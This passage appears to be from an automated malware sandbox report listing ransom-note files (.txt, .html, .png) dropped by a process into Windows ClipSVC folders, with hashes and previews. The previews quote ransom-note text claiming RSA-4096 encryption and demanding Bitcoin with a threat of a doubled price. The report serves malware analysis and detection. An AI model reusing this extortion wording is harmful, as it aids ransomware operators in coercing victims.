                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\ClipSVC\Archive\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\ClipSVC\Archive\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\ClipSVC\Archive\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\ClipSVC\GenuineTicket\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\ClipSVC\GenuineTicket\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\ClipSVC\GenuineTicket\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\ClipSVC\Import\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\ClipSVC\Import\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\ClipSVC\Import\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\ClipSVC\Install\Apps\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\ClipSVC\Install\Apps\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\ClipSVC\Install\Apps\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\ClipSVC\Install\Migration\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\ClipSVC\Install\Migration\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\ClipSVC\Install\Migration\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\ClipSVC\Install\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\ClipSVC\Install\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\ClipSVC\Install\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\ClipSVC\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\ClipSVC\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
